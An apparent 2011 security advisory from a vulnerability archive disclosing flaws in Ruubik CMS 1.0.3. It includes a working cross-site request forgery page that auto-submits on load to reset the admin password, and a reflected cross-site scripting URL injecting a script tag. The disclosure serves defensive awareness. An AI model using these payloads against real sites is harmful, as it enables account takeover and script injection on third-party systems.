Ruubik CMS 1.0.3 Cross Site Request Forgery / Cross Site Scripting

2011.03.10
Credit: Khashayar Fereidani
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

---------------------------------------------------------------- WebApplication : RuubikCMS Version 1.0.3 Type of vunlnerability : CSRF ( Change Admin Password ) And XSS Risk of use : Medium ---------------------------------------------------------------- Producer Website : http://www.ruubikcms.com/ ---------------------------------------------------------------- Discovered by : Khashayar Fereidani Team Website : Http://IRCRASH.COM Team Members : Khashayar Fereidani - Sina YazdanMehr - Arash Allebrahim English Forums : Http://IRCRASH.COM/forums/ Email : irancrash [ a t ] gmail [ d o t ] com ---------------------------------------------------------------- CSRF For Change Admin Password : <html> <head></head> <body onLoad=javascript:document.form.submit()> <form action="http://examplesite/ruubikcms/cms/users.php?role=5&p=admin"; method="POST" name="form"> <input type="hidden" name="save" value="1"> <input type="hidden" name="ordernum" value="1"> <input type="hidden" name="username_hidden" value="admin"> <input type="hidden" name="password" value="password"> <input type="hidden" name="confirmpassword" value="password"> </form> </body> </html> ------------------------------------------------ Cross Site Scripting Vulnerability : http://examplesite/ruubikcms/cms/includes/head.php?cmspage=</title><script>alert(123);</script>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top